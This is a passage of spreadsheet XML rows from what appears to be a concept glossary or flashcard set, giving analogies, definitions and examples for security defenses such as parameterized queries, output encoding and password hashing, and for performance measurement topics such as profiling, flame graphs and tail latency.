          <t>A post-office wall poster of the ten most-wanted web outlaws, re-ranked every few years - the mugshots of Injection and Broken Access Control always hang near the top.</t>
        </is>
      </c>
      <c r="E961" t="inlineStr">
        <is>
          <t>A periodically updated, community-ranked list of the most critical web application security risks - the baseline checklist.</t>
        </is>
      </c>
      <c r="F961" t="inlineStr">
        <is>
          <t>A01 Broken Access Control / A03 Injection / used for audits, training, and requirements</t>
        </is>
      </c>
      <c r="G961" t="inlineStr">
        <is>
          <t>CWE - CWE exhaustively catalogs hundreds of weakness types; the OWASP Top 10 ranks the ten most critical web risks.</t>
        </is>
      </c>
      <c r="H961" t="inlineStr">
        <is>
          <t>The FBI most-wanted wall of web crime.</t>
        </is>
      </c>
      <c r="J961" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K961" t="inlineStr">
        <is>
          <t>Security: attack classes</t>
        </is>
      </c>
    </row>
    <row r="962">
      <c r="A962" t="n">
        <v>0</v>
      </c>
      <c r="B962" t="inlineStr">
        <is>
          <t>960</t>
        </is>
      </c>
      <c r="C962" t="inlineStr">
        <is>
          <t>Input validation</t>
        </is>
      </c>
      <c r="D962" t="inlineStr">
        <is>
          <t>The club bouncer checks every arrival against a strict guest list - right name format, right age, right dress code - and turns away anything unexpected at the ONLY door in.</t>
        </is>
      </c>
      <c r="E962" t="inlineStr">
        <is>
          <t>Check all untrusted input against strict expectations - type, length, range, format - using allowlists, at the trust boundary.</t>
        </is>
      </c>
      <c r="F962" t="inlineStr">
        <is>
          <t>age: integer 0-130 or reject / username: ^[a-z0-9_]{3,20}$ / validate server-side; client checks are only UX</t>
        </is>
      </c>
      <c r="G962" t="inlineStr">
        <is>
          <t>Output encoding - validation filters what comes IN; encoding neutralizes what goes OUT into a rendering context.</t>
        </is>
      </c>
      <c r="H962" t="inlineStr">
        <is>
          <t>Airport security holding an allowlist manifest.</t>
        </is>
      </c>
      <c r="J962" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K962" t="inlineStr">
        <is>
          <t>Security: defenses</t>
        </is>
      </c>
    </row>
    <row r="963">
      <c r="A963" t="n">
        <v>0</v>
      </c>
      <c r="B963" t="inlineStr">
        <is>
          <t>961</t>
        </is>
      </c>
      <c r="C963" t="inlineStr">
        <is>
          <t>Output encoding</t>
        </is>
      </c>
      <c r="D963" t="inlineStr">
        <is>
          <t>Before hanging visitor art in the gallery, the curator seals each piece behind glass: the hypnotic rune is still visible as a drawing, but its magic cannot fire through the pane.</t>
        </is>
      </c>
      <c r="E963" t="inlineStr">
        <is>
          <t>Escape data for the context where it is emitted - HTML, attribute, JS, URL - so it displays as data and can never execute; the core XSS defense.</t>
        </is>
      </c>
      <c r="F963" t="inlineStr">
        <is>
          <t>&lt;script&gt; becomes &amp;lt;script&amp;gt; / modern templates auto-escape (Jinja2, React) / encode per context: HTML body vs attribute vs URL</t>
        </is>
      </c>
      <c r="G963" t="inlineStr">
        <is>
          <t>Input validation - validation cannot foresee every output context; encoding at the point of output is what defuses XSS.</t>
        </is>
      </c>
      <c r="H963" t="inlineStr">
        <is>
          <t>A snake defanged but still on display.</t>
        </is>
      </c>
      <c r="J963" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K963" t="inlineStr">
        <is>
          <t>Security: defenses</t>
        </is>
      </c>
    </row>
    <row r="964">
      <c r="A964" t="n">
        <v>0</v>
      </c>
      <c r="B964" t="inlineStr">
        <is>
          <t>962</t>
        </is>
      </c>
      <c r="C964" t="inlineStr">
        <is>
          <t>Parameterized queries</t>
        </is>
      </c>
      <c r="D964" t="inlineStr">
        <is>
          <t>The clerk now uses a rigid form: the command is pre-printed in ink and guests may only fill labeled boxes. Whatever Bob writes in the NAME box stays a name - it can never become an instruction.</t>
        </is>
      </c>
      <c r="E964" t="inlineStr">
        <is>
          <t>Send SQL structure and user data separately as bound parameters, so input can never change the query's shape - the SQLi killer.</t>
        </is>
      </c>
      <c r="F964" t="inlineStr">
        <is>
          <t>cur.execute('SELECT * FROM u WHERE name=%s', (name,)) / never build SQL by string concatenation / ORMs parameterize by default</t>
        </is>
      </c>
      <c r="G964" t="inlineStr">
        <is>
          <t>Escaping input for SQL - escaping is error-prone and dialect-specific; parameters make injection structurally impossible.</t>
        </is>
      </c>
      <c r="H964" t="inlineStr">
        <is>
          <t>Letters sorted into locked, labeled mailboxes.</t>
        </is>
      </c>
      <c r="J964" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K964" t="inlineStr">
        <is>
          <t>Security: defenses</t>
        </is>
      </c>
    </row>
    <row r="965">
      <c r="A965" t="n">
        <v>0</v>
      </c>
      <c r="B965" t="inlineStr">
        <is>
          <t>963</t>
        </is>
      </c>
      <c r="C965" t="inlineStr">
        <is>
          <t>Least privilege</t>
        </is>
      </c>
      <c r="D965" t="inlineStr">
        <is>
          <t>The janitor's key opens exactly one supply closet, never the vault; when his keyring is stolen, the thief inherits mops. Grant only the doors the job requires.</t>
        </is>
      </c>
      <c r="E965" t="inlineStr">
        <is>
          <t>Every user, process, and key gets the minimum access its task needs, so a compromise yields the smallest possible blast radius.</t>
        </is>
      </c>
      <c r="F965" t="inlineStr">
        <is>
          <t>app DB user: SELECT/INSERT only, no DROP / CI token scoped to one repo, read-only / containers run as non-root</t>
        </is>
      </c>
      <c r="G965" t="inlineStr">
        <is>
          <t>Zero trust - zero trust refuses to let network location imply trust; least privilege minimizes what any identity can do.</t>
        </is>
      </c>
      <c r="H965" t="inlineStr">
        <is>
          <t>A valet key that only starts the ignition.</t>
        </is>
      </c>
      <c r="J965" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K965" t="inlineStr">
        <is>
          <t>Security: defenses</t>
        </is>
      </c>
    </row>
    <row r="966">
      <c r="A966" t="n">
        <v>0</v>
      </c>
      <c r="B966" t="inlineStr">
        <is>
          <t>964</t>
        </is>
      </c>
      <c r="C966" t="inlineStr">
        <is>
          <t>Password hashing</t>
        </is>
      </c>
      <c r="D966" t="inlineStr">
        <is>
          <t>Each password goes through a deliberately SLOW one-way meat grinder with a pinch of unique salt, so two identical steaks grind into different mince - and nothing can be un-ground.</t>
        </is>
      </c>
      <c r="E966" t="inlineStr">
        <is>
          <t>Store only slow, salted, one-way hashes (bcrypt, argon2) so stolen databases cannot be reversed and rainbow tables are useless.</t>
        </is>
      </c>
      <c r="F966" t="inlineStr">
        <is>
          <t>hash = bcrypt(password, salt, cost=12) / unique salt per user, stored beside the hash / never: MD5, plain SHA-256, or plaintext</t>
        </is>
      </c>
      <c r="G966" t="inlineStr">
        <is>
          <t>Encryption - encryption is reversible with a key; password hashing must be one-way, verified by re-hashing.</t>
        </is>
      </c>
      <c r="H966" t="inlineStr">
        <is>
          <t>A shredder that shreds identical letters differently.</t>
        </is>
      </c>
      <c r="J966" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K966" t="inlineStr">
        <is>
          <t>Security: defenses</t>
        </is>
      </c>
    </row>
    <row r="967">
      <c r="A967" t="n">
        <v>0</v>
      </c>
      <c r="B967" t="inlineStr">
        <is>
          <t>965</t>
        </is>
      </c>
      <c r="C967" t="inlineStr">
        <is>
          <t>Secrets management</t>
        </is>
      </c>
      <c r="D967" t="inlineStr">
        <is>
          <t>API keys taped under the doormat (committed to the repo) get copied by every passerby forever; the vault instead hands out short-lived keys through a slot and logs who asked.</t>
        </is>
      </c>
      <c r="E967" t="inlineStr">
        <is>
          <t>Keep credentials out of code and repos; inject them at runtime from a vault or environment, with rotation, audit, and short lifetimes.</t>
        </is>
      </c>
      <c r="F967" t="inlineStr">
        <is>
          <t>a key pushed to git is burned - rotate it / vault issues short-lived DB creds per service / CI secrets: masked, scoped, rotated</t>
        </is>
      </c>
      <c r="G967" t="inlineStr">
        <is>
          <t>Config management - config is safe to commit; secrets must never touch the repo and need rotation plus audit.</t>
        </is>
      </c>
      <c r="H967" t="inlineStr">
        <is>
          <t>Mission tapes that self-destruct after use.</t>
        </is>
      </c>
      <c r="J967" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K967" t="inlineStr">
        <is>
          <t>Security: defenses</t>
        </is>
      </c>
    </row>
    <row r="968">
      <c r="A968" t="n">
        <v>0</v>
      </c>
      <c r="B968" t="inlineStr">
        <is>
          <t>966</t>
        </is>
      </c>
      <c r="C968" t="inlineStr">
        <is>
          <t>TLS / encryption in transit</t>
        </is>
      </c>
      <c r="D968" t="inlineStr">
        <is>
          <t>Letters cross town in an armored tube: sealed (encryption), tamper-evident (integrity), and the courier shows government ID (the certificate) proving he really is from the bank.</t>
        </is>
      </c>
      <c r="E968" t="inlineStr">
        <is>
          <t>TLS gives connections confidentiality, integrity, and server authentication via certificates; encrypt every hop, internal traffic too.</t>
        </is>
      </c>
      <c r="F968" t="inlineStr">
        <is>
          <t>https everywhere; HSTS header set / cert chain: leaf -&gt; intermediate -&gt; trusted CA / a plain-HTTP internal hop is an open postcard</t>
        </is>
      </c>
      <c r="G968" t="inlineStr">
        <is>
          <t>Encryption at rest - TLS protects data moving between machines; at-rest protects data sitting on disk.</t>
        </is>
      </c>
      <c r="H968" t="inlineStr">
        <is>
          <t>An armored courier with photo ID.</t>
        </is>
      </c>
      <c r="J968" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K968" t="inlineStr">
        <is>
          <t>Security: defenses</t>
        </is>
      </c>
    </row>
    <row r="969">
      <c r="A969" t="n">
        <v>0</v>
      </c>
      <c r="B969" t="inlineStr">
        <is>
          <t>967</t>
        </is>
      </c>
      <c r="C969" t="inlineStr">
        <is>
          <t>Encryption at rest</t>
        </is>
      </c>
      <c r="D969" t="inlineStr">
        <is>
          <t>The jewels stay locked in a safe even while sitting at home: a burglar who hauls away the entire disk drags off a box of noise without the key.</t>
        </is>
      </c>
      <c r="E969" t="inlineStr">
        <is>
          <t>Encrypt stored data - disks, databases, backups - so stolen media or snapshots are useless without keys kept separate from the data.</t>
        </is>
      </c>
      <c r="F969" t="inlineStr">
        <is>
          <t>AES-256 full-disk or column encryption / keys live in a KMS, never beside the data / classic breach: one unencrypted old backup</t>
        </is>
      </c>
      <c r="G969" t="inlineStr">
        <is>
          <t>TLS - at rest guards stored bytes against stolen disks; TLS guards bytes crossing the network.</t>
        </is>
      </c>
      <c r="H969" t="inlineStr">
        <is>
          <t>A parked armored truck, still locked.</t>
        </is>
      </c>
      <c r="J969" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K969" t="inlineStr">
        <is>
          <t>Security: defenses</t>
        </is>
      </c>
    </row>
    <row r="970">
      <c r="A970" t="n">
        <v>0</v>
      </c>
      <c r="B970" t="inlineStr">
        <is>
          <t>968</t>
        </is>
      </c>
      <c r="C970" t="inlineStr">
        <is>
          <t>Defense in depth</t>
        </is>
      </c>
      <c r="D970" t="inlineStr">
        <is>
          <t>The castle never trusts one wall: moat, drawbridge, portcullis, inner keep, and guards at each layer. An invader who swims the moat still faces four more failures.</t>
        </is>
      </c>
      <c r="E970" t="inlineStr">
        <is>
          <t>Layer independent controls - validation, least privilege, encryption, monitoring - so one failed defense does not mean compromise.</t>
        </is>
      </c>
      <c r="F970" t="inlineStr">
        <is>
          <t>SQLi blocked by params AND a WAF / stolen password meets MFA, then a scoped role / each layer assumes the previous one failed</t>
        </is>
      </c>
      <c r="G970" t="inlineStr">
        <is>
          <t>Perimeter security - a hard shell with a soft center is exactly the single layer that depth replaces.</t>
        </is>
      </c>
      <c r="H970" t="inlineStr">
        <is>
          <t>Swiss cheese slices stacked so the holes never align.</t>
        </is>
      </c>
      <c r="J970" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K970" t="inlineStr">
        <is>
          <t>Security: defenses</t>
        </is>
      </c>
    </row>
    <row r="971">
      <c r="A971" t="n">
        <v>0</v>
      </c>
      <c r="B971" t="inlineStr">
        <is>
          <t>969</t>
        </is>
      </c>
      <c r="C971" t="inlineStr">
        <is>
          <t>Patching &amp; updates</t>
        </is>
      </c>
      <c r="D971" t="inlineStr">
        <is>
          <t>The list of KNOWN holes in your roof is published in the newspaper; burglars read it too. Every night you delay patching, someone with the same list tests your shingles.</t>
        </is>
      </c>
      <c r="E971" t="inlineStr">
        <is>
          <t>Apply security updates promptly: most breaches exploit KNOWN vulnerabilities with public CVEs, and hole age predicts exploitation.</t>
        </is>
      </c>
      <c r="F971" t="inlineStr">
        <is>
          <t>dependabot PR: lodash CVE fix, merge today / Equifax: Struts patch available 76 days before breach / inventory + SLA: critical patches within 7 days</t>
        </is>
      </c>
      <c r="G971" t="inlineStr">
        <is>
          <t>Zero-day defense - zero-days are unknowable in advance; patching closes the known holes behind most breaches.</t>
        </is>
      </c>
      <c r="H971" t="inlineStr">
        <is>
          <t>A vaccination schedule for your dependencies.</t>
        </is>
      </c>
      <c r="J971" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K971" t="inlineStr">
        <is>
          <t>Security: defenses</t>
        </is>
      </c>
    </row>
    <row r="972">
      <c r="A972" t="n">
        <v>0</v>
      </c>
      <c r="B972" t="inlineStr">
        <is>
          <t>970</t>
        </is>
      </c>
      <c r="C972" t="inlineStr">
        <is>
          <t>Measure before optimizing</t>
        </is>
      </c>
      <c r="D972" t="inlineStr">
        <is>
          <t>A surgeon refuses to cut until the X-ray hangs on the lightbox: engineers who 'just know' the slow part operate on the healthy organ nine times out of ten.</t>
        </is>
      </c>
      <c r="E972" t="inlineStr">
        <is>
          <t>Profile the real workload before changing code - intuition about where time goes is usually wrong - then re-measure to confirm the win.</t>
        </is>
      </c>
      <c r="F972" t="inlineStr">
        <is>
          <t>profile: 62% in JSON parsing, not the 'slow' loop / swap the parser -&gt; re-measure: 2.4x faster / no numbers, no optimization</t>
        </is>
      </c>
      <c r="G972" t="inlineStr">
        <is>
          <t>Premature optimization - the vice this rule prevents; measurement turns guessing into targeting.</t>
        </is>
      </c>
      <c r="H972" t="inlineStr">
        <is>
          <t>Darts thrown blindfolded until someone turns on the light.</t>
        </is>
      </c>
      <c r="J972" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K972" t="inlineStr">
        <is>
          <t>Performance: measurement</t>
        </is>
      </c>
    </row>
    <row r="973">
      <c r="A973" t="n">
        <v>0</v>
      </c>
      <c r="B973" t="inlineStr">
        <is>
          <t>971</t>
        </is>
      </c>
      <c r="C973" t="inlineStr">
        <is>
          <t>Profiler</t>
        </is>
      </c>
      <c r="D973" t="inlineStr">
        <is>
          <t>An X-ray of the running program: each bone glows in proportion to time spent inside it - one femur (a JSON parser) blazes white while the code you suspected is barely a shadow.</t>
        </is>
      </c>
      <c r="E973" t="inlineStr">
        <is>
          <t>A tool that reports where a program spends time or memory, by function, turning 'it feels slow' into a ranked list of hot spots.</t>
        </is>
      </c>
      <c r="F973" t="inlineStr">
        <is>
          <t>py-spy top --pid 4711 / perf record ./app &amp;&amp; perf report / top entry: hash_password 71% of samples</t>
        </is>
      </c>
      <c r="G973" t="inlineStr">
        <is>
          <t>Benchmark - a benchmark scores overall speed; a profiler explains WHERE inside the program the time goes.</t>
        </is>
      </c>
      <c r="H973" t="inlineStr">
        <is>
          <t>A thermal camera pointed at running code.</t>
        </is>
      </c>
      <c r="J973" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K973" t="inlineStr">
        <is>
          <t>Performance: measurement</t>
        </is>
      </c>
    </row>
    <row r="974">
      <c r="A974" t="n">
        <v>0</v>
      </c>
      <c r="B974" t="inlineStr">
        <is>
          <t>972</t>
        </is>
      </c>
      <c r="C974" t="inlineStr">
        <is>
          <t>Sampling vs instrumentation</t>
        </is>
      </c>
      <c r="D974" t="inlineStr">
        <is>
          <t>A pollster phones the program a thousand times a second asking 'what are you doing RIGHT NOW?' (sampling); versus an inspector logging every function's entry and exit - exact, but the watching slows the race.</t>
        </is>
      </c>
      <c r="E974" t="inlineStr">
        <is>
          <t>Sampling profilers interrupt periodically to record stacks - low overhead, statistical; instrumentation logs every call exactly but distorts timing.</t>
        </is>
      </c>
      <c r="F974" t="inlineStr">
        <is>
          <t>sampling: perf, py-spy - safe in production / instrumentation: cProfile, callgrind - exact, slow / heavy probes can move the hot spot they measure</t>
        </is>
      </c>
      <c r="G974" t="inlineStr">
        <is>
          <t>Distributed tracing - tracing follows individual requests across services; profiling aggregates where CPU time goes.</t>
        </is>
      </c>
      <c r="H974" t="inlineStr">
        <is>
          <t>Exit polls versus a turnstile counting every visitor.</t>
        </is>
      </c>
      <c r="J974" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K974" t="inlineStr">
        <is>
          <t>Performance: measurement</t>
        </is>
      </c>
    </row>
    <row r="975">
      <c r="A975" t="n">
        <v>0</v>
      </c>
      <c r="B975" t="inlineStr">
        <is>
          <t>973</t>
        </is>
      </c>
      <c r="C975" t="inlineStr">
        <is>
          <t>Flame graph</t>
        </is>
      </c>
      <c r="D975" t="inlineStr">
        <is>
          <t>A city skyline made of fire: every building is a function, its WIDTH is the time it burns, and towers stand on the callers beneath them - your eye jumps straight to the widest blaze.</t>
        </is>
      </c>
      <c r="E975" t="inlineStr">
        <is>
          <t>Visualization of profiled stacks: each box is a function, width is time share, stacking shows call depth; wide plateaus are hot spots.</t>
        </is>
      </c>
      <c r="F975" t="inlineStr">
        <is>
          <t>perf record -g; flamegraph.pl &gt; profile.svg / wide plateau: serialize() holds 40% of width / click a box to zoom into its callees</t>
        </is>
      </c>
      <c r="G975" t="inlineStr">
        <is>
          <t>Call graph - a call graph shows who-calls-whom; a flame graph adds time-proportional width for hot-spot hunting.</t>
        </is>
      </c>
      <c r="H975" t="inlineStr">
        <is>
          <t>Burning skyline where width equals heat.</t>
        </is>
      </c>
      <c r="J975" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K975" t="inlineStr">
        <is>
          <t>Performance: measurement</t>
        </is>
      </c>
    </row>
    <row r="976">
      <c r="A976" t="n">
        <v>0</v>
      </c>
      <c r="B976" t="inlineStr">
        <is>
          <t>974</t>
        </is>
      </c>
      <c r="C976" t="inlineStr">
        <is>
          <t>Microbenchmark traps</t>
        </is>
      </c>
      <c r="D976" t="inlineStr">
        <is>
          <t>The lab treadmill clocks the cheetah at 100 km/h - but the JIT deleted its legwork as dead code, the track was pre-warmed, and the real street has traffic. Tiny-loop numbers lie smoothly.</t>
        </is>
      </c>
      <c r="E976" t="inlineStr">
        <is>
          <t>Tiny-loop timings mislead: dead-code elimination, JIT warmup, warm caches, and unrealistic data produce numbers that do not transfer.</t>
        </is>
      </c>
      <c r="F976" t="inlineStr">
        <is>
          <t>JIT removed the loop: '0.2 ns' result / use black_box(x), JMH/criterion, warmup runs / cold-cache production never matches a warm bench</t>
        </is>
      </c>
      <c r="G976" t="inlineStr">
        <is>
          <t>Load testing - load tests hit the whole system with realistic traffic; microbenchmarks time isolated snippets.</t>
        </is>
      </c>
      <c r="H976" t="inlineStr">
        <is>
          <t>A cheetah timed on a lab treadmill.</t>
        </is>
      </c>
      <c r="J976" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K976" t="inlineStr">
        <is>
          <t>Performance: measurement</t>
        </is>
      </c>
    </row>
    <row r="977">
      <c r="A977" t="n">
        <v>0</v>
      </c>
      <c r="B977" t="inlineStr">
        <is>
          <t>975</t>
        </is>
      </c>
      <c r="C977" t="inlineStr">
        <is>
          <t>Latency vs throughput</t>
        </is>
      </c>
      <c r="D977" t="inlineStr">
        <is>
          <t>Widening the highway moves more cars per hour (throughput) yet no single car arrives a minute sooner (latency); the bullet-bike courier is the exact reverse.</t>
        </is>
      </c>
      <c r="E977" t="inlineStr">
        <is>
          <t>Latency is the time for one operation; throughput is operations completed per second - improving one can worsen the other.</t>
        </is>
      </c>
      <c r="F977" t="inlineStr">
        <is>
          <t>latency: 20 ms per request / throughput: 5,000 req/s across the pool / bigger batches: throughput up, per-item latency up</t>
        </is>
      </c>
      <c r="G977" t="inlineStr">
        <is>
          <t>Bandwidth - bandwidth is the capacity ceiling for moving data; throughput is the achieved rate of completed work.</t>
        </is>
      </c>
      <c r="H977" t="inlineStr">
        <is>
          <t>Freight train versus motorcycle courier.</t>
        </is>
      </c>
      <c r="J977" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K977" t="inlineStr">
        <is>
          <t>Performance: measurement</t>
        </is>
      </c>
    </row>
    <row r="978">
      <c r="A978" t="n">
        <v>0</v>
      </c>
      <c r="B978" t="inlineStr">
        <is>
          <t>976</t>
        </is>
      </c>
      <c r="C978" t="inlineStr">
        <is>
          <t>Percentiles vs averages</t>
        </is>
      </c>
      <c r="D978" t="inlineStr">
        <is>
          <t>'This river averages one meter deep,' says the sign - straight over a nine-meter trench that soaks every tenth crosser. p50 is the median crosser; p99 nearly drowned.</t>
        </is>
      </c>
      <c r="E978" t="inlineStr">
        <is>
          <t>Report p50/p95/p99 latency rather than the mean: averages hide the slow tail that real users actually experience.</t>
        </is>
      </c>
      <c r="F978" t="inlineStr">
        <is>
          <t>mean 45 ms looks healthy / p50 22 ms, p99 2,300 ms - tail pain revealed / set SLOs and alerts on p99, not the mean</t>
        </is>
      </c>
      <c r="G978" t="inlineStr">
        <is>
          <t>Median vs mean - the median (p50) is a percentile robust to outliers; the mean is dragged by extreme values.</t>
        </is>
      </c>
      <c r="H978" t="inlineStr">
        <is>
          <t>One drowned statistician in an averagely shallow river.</t>
        </is>
      </c>
      <c r="J978" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K978" t="inlineStr">
        <is>
          <t>Performance: measurement</t>
        </is>
      </c>
    </row>
    <row r="979">
      <c r="A979" t="n">
        <v>0</v>
      </c>
      <c r="B979" t="inlineStr">
        <is>
          <t>977</t>
        </is>
      </c>
      <c r="C979" t="inlineStr">
        <is>
          <t>Tail latency</t>
        </is>
      </c>
      <c r="D979" t="inlineStr">
        <is>
          <t>A page fires a hundred backend calls, so nearly every visitor draws at least one snail from the deck - the slowest 1% of requests quietly becomes almost 100% of users.</t>
        </is>
      </c>
      <c r="E979" t="inlineStr">
        <is>
          <t>At scale the slowest percentile dominates experience: a page issuing 100 calls makes most users hit at least one p99 response.</t>
        </is>
      </c>
      <c r="F979" t="inlineStr">
        <is>
          <t>P(at least one p99) = 1 - 0.99^100 = 63% / fan-out amplifies the tail / fixes: hedged requests, timeouts, fewer calls</t>
        </is>
      </c>
      <c r="G979" t="inlineStr">
        <is>
          <t>Average latency - the tail is invisible in the mean, yet under fan-out it defines what users feel.</t>
        </is>
      </c>
      <c r="H979" t="inlineStr">
        <is>
          <t>One snail hiding in every convoy.</t>
        </is>
      </c>
      <c r="J979" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K979" t="inlineStr">
        <is>
          <t>Performance: measurement</t>
        </is>
      </c>
    </row>
    <row r="980">
      <c r="A980" t="n">
        <v>0</v>
      </c>
      <c r="B980" t="inlineStr">
        <is>
          <t>978</t>
        </is>
      </c>
      <c r="C980" t="inlineStr">
        <is>
          <t>Latency numbers ladder</t>
        </is>
      </c>
      <c r="D980" t="inlineStr">
        <is>
          <t>Scale a 1 ns L1 hit up to one second: RAM is a minute-long walk away, an SSD read takes a day, a disk seek four months, a cross-ocean packet nearly five years. Each rung drops by powers of ten.</t>
        </is>
      </c>
      <c r="E980" t="inlineStr">
        <is>
          <t>Know the magnitudes: L1 ~1 ns, RAM ~100 ns, same-DC hop ~0.5 ms, SSD read ~100 us, disk seek ~10 ms, cross-ocean ~150 ms.</t>
        </is>
      </c>
      <c r="F980" t="inlineStr">
        <is>
          <t>RAM vs L1: ~100x; disk seek vs RAM: ~100,000x / napkin math: 1M random disk seeks = hours / the ladder kills bad designs before code exists</t>
        </is>
      </c>
      <c r="G980" t="inlineStr">
        <is>
          <t>Big-O - Big-O counts how operations grow; the ladder prices what each single operation really costs.</t>
        </is>
      </c>
      <c r="H980" t="inlineStr">
        <is>
          <t>If a cache hit were a heartbeat, a disk seek is a sea voyage.</t>
        </is>
      </c>
      <c r="J980" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K980" t="inlineStr">
        <is>
          <t>Performance: measurement</t>
        </is>
      </c>
    </row>
    <row r="981">
      <c r="A981" t="n">
        <v>0</v>
      </c>
      <c r="B981" t="inlineStr">
        <is>
          <t>979</t>
        </is>
      </c>
      <c r="C981" t="inlineStr">
        <is>
          <t>Load testing</t>
        </is>
      </c>
      <c r="D981" t="inlineStr">
        <is>
          <t>Before the bridge opens, engineers park a convoy of loaded trucks on it and watch the strain gauges - better to hear the groan at rehearsal than under Black Friday's crowd.</t>
        </is>
      </c>
      <c r="E981" t="inlineStr">
        <is>
          <t>Drive the system with realistic concurrent traffic to find throughput limits, latency degradation, and breaking points before users do.</t>
        </is>
      </c>
      <c r="F981" t="inlineStr">
        <is>
          <t>k6 run --vus 500 --duration 10m / plot p99 versus load; find the curve's knee / soak test: 24 hours reveals the leaks</t>
        </is>
      </c>
      <c r="G981" t="inlineStr">
        <is>
          <t>Microbenchmark - load tests exercise the full deployed system under concurrency; microbenchmarks time code snippets.</t>
        </is>
      </c>
      <c r="H981" t="inlineStr">
        <is>
          <t>Sandbag convoys parked on the new bridge.</t>
        </is>
      </c>
      <c r="J981" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K981" t="inlineStr">
        <is>
          <t>Performance: measurement</t>
        </is>
      </c>
    </row>
    <row r="982">
      <c r="A982" t="n">
        <v>0</v>
      </c>
      <c r="B982" t="inlineStr">
        <is>
          <t>980</t>
        </is>
      </c>
      <c r="C982" t="inlineStr">
        <is>
          <t>Algorithmic wins first</t>
        </is>
      </c>
      <c r="D982" t="inlineStr">
        <is>
          <t>Don't wax the horse-cart to shave seconds - swap it for a train. Replacing the quadratic sort beats a hundred micro-shavings; a better route trumps a faster gallop.</t>
        </is>
      </c>
      <c r="E982" t="inlineStr">
        <is>
          <t>A better algorithm or data structure - O(n^2) to O(n log n), list scan to hash - dwarfs micro-tuning; fix complexity before constants.</t>
        </is>
      </c>
      <c r="F982" t="inlineStr">
        <is>
          <t>membership test in loop: list O(n^2) -&gt; set O(n) / 45-minute job drops to 12 seconds / no compiler flag buys you 200x</t>
        </is>
      </c>
      <c r="G982" t="inlineStr">
        <is>
          <t>Micro-optimization - shaves constant factors; an algorithmic change bends the growth curve itself.</t>
        </is>
      </c>
      <c r="H982" t="inlineStr">
        <is>
          <t>Trading a rowboat for a hydrofoil instead of rowing harder.</t>
        </is>
      </c>
      <c r="J982" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K982" t="inlineStr">
        <is>
          <t>Performance: optimization</t>
        </is>
      </c>
    </row>
    <row r="983">
      <c r="A983" t="n">
        <v>0</v>
      </c>
      <c r="B983" t="inlineStr">
        <is>
          <t>981</t>
        </is>
      </c>
      <c r="C983" t="inlineStr">
        <is>
          <t>Hot path focus</t>
        </is>
      </c>
      <c r="D983" t="inlineStr">
        <is>
          <t>The store's heat-map shows 90% of all footsteps in ONE aisle; polish that aisle's floor and leave the dusty corners alone. Waxing a corridor nobody walks wins nothing.</t>
        </is>
      </c>
      <c r="E983" t="inlineStr">
        <is>
          <t>A small fraction of code consumes most runtime; optimize only the measured hot path - speeding cold code buys nothing.</t>
        </is>
      </c>
      <c r="F983" t="inlineStr">
        <is>
          <t>profile: 3 functions burn 85% of time / optimize those; ignore the other 10,000 / 2x on an 80% path = 1.67x overall</t>
        </is>
      </c>
      <c r="G983" t="inlineStr">
        <is>
          <t>Amdahl's law - Amdahl supplies the math ceiling; hot-path focus is the practice of aiming where the math pays.</t>
        </is>
      </c>
      <c r="H983" t="inlineStr">
        <is>
          <t>Sharpening only the blade edge that touches the wood.</t>
        </is>
      </c>
      <c r="J983" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K983" t="inlineStr">
        <is>
          <t>Performance: optimization</t>
        </is>
      </c>
    </row>
    <row r="984">
      <c r="A984" t="n">
        <v>0</v>
      </c>
      <c r="B984" t="inlineStr">
        <is>
          <t>982</t>
        </is>
      </c>
      <c r="C984" t="inlineStr">
        <is>
          <t>Data locality &amp; caches</t>
        </is>
      </c>
      <c r="D984" t="inlineStr">
        <is>
          <t>A carpenter keeps the next nails in his belt (cache line), not in a warehouse downtown (RAM): arrays march belt-to-hand, while a linked list sends him across town for every single nail.</t>
        </is>
      </c>
      <c r="E984" t="inlineStr">
        <is>
          <t>CPUs fetch memory in cache lines and prefetch sequential access; contiguous linear layouts run orders faster than pointer-chasing.</t>
        </is>
      </c>
      <c r="F984" t="inlineStr">
        <is>
          <t>row-major traversal: ~4x faster than column-wise / array-of-structs -&gt; struct-of-arrays for hot fields / linked list walk: one cache miss per node</t>
        </is>
      </c>
      <c r="G984" t="inlineStr">
        <is>
          <t>Application caching - that stores computed results; locality arranges data so the CPU's hardware caches hit.</t>
        </is>
      </c>
      <c r="H984" t="inlineStr">
        <is>
          <t>Reading a book page by page versus one word per library visit.</t>
        </is>
      </c>
      <c r="J984" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K984" t="inlineStr">
